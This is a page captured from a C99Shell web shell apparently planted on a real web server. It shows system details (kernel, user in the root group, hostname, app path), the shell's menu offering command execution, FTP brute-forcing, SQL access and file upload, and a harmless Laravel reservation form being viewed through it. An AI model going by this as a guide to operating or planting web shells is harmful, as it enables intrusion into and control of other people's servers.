!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/test.qr.picotech.app/public_html/resources/views/reservation/   drwxr-xr-x
Free 29 GB of 117.98 GB (24.58%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     form.blade.php (2.33 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@csrf
<div>
    <section>
        <div class="row">
            <div class="col-lg-12 mb-3">
                <div class="form-group">
                    <label class="text-label">{{ trans('layout.restaurant') }}*</label>
                    <select name="restaurant_id" class="form-control" required>
                        @foreach($restaurants as $restaurant)
                            <option value="{{ $restaurant->id }}"
                                {{ old('restaurant_id', $reservation->restaurant_id ?? '') == $restaurant->id ? 'selected' : '' }}>
                                {{ $restaurant->name }}
                            </option>
                        @endforeach
                    </select>
                </div>

            </div>
            <div class="col-lg-12 mb-3">
                <div class="form-group">
                    <label class="text-label">{{ trans('layout.date') }}*</label>
                    <div class="input-group">
                        <input type="text" id="checkin-datepicker" value="{{ old('date') ? old('date') : (isset($reservation) ? $reservation->date : '') }}" name="date" class="form-control" required>
                        <span class="input-group-text" id="checkin-date">
                            <i class="fa fa-calendar"></i>
                        </span>
                    </div>
                </div>
            </div>

            <div class="col-lg-12 mb-3">
                <div class="form-group">
                    <label class="text-label">{{ trans('layout.party_size') }}*</label>
                    <input
                        value="{{ old('party_size') ? old('party_size') : (isset($reservation) ? $reservation->party_size : '') }}"
                        type="number" name="party_size" class="form-control" required>
                </div>
            </div>
            <div class="col-lg-12 mb-3">
                <div class="form-group">
                    <label class="text-label">{{ trans('layout.contact_number') }}*</label>
                    <input
                        value="{{ old('contact_number') ? old('contact_number') : (isset($reservation) ? $reservation->contact_number : '') }}"
                        type="number" name="contact_number" class="form-control" required>
                </div>
            </div>
        </div>
    </section>

</div>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0036 ]--